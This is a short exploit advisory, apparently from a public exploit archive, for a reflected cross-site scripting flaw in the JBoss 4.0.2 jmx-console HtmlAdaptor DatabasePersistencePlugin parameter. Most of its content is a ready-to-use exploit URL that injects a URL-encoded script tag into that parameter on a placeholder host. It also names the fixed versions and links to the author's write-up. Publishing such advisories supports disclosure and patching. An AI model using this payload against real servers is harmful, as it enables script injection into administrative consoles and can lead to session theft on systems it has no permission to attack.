# Exploit Title: Reflected XSS in jmx-console HtmlAdaptor DatabasePersistencePlugin parameter
# Date: 9th February 2017
# Exploit Author: justpentest
# Vendor Homepage: http://jbossas.jboss.org/downloads/
# Version: Jboss 4.0.2
# Contact: transform2secure@gmail.com


1) Description: 
Jmx-console's DatabasePersistencePlugin parameter in HtmlAdaptor is vulnerable to XSS
/jmx-console/HtmlAdaptor?DatabasePersistencePlugin

2) Exploit:
https://abc.com:8080/jmx-console/HtmlAdaptor?DatabasePersistencePlugin=org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E&name=jboss.ejb%3aservice%3dEJBTimerService%2cpersistencePolicy%3ddatabase&action=updateAttributes&DataSource=jboss.jca%3aservice%3dDataSourceBinding%2cname%3dDefaultDS

3) Fixed version:
Versions after 4.0.2 are fixed

For more details visit http://justpentest.blogspot.in/2017/02/reflected-xss-in-jmx-console.html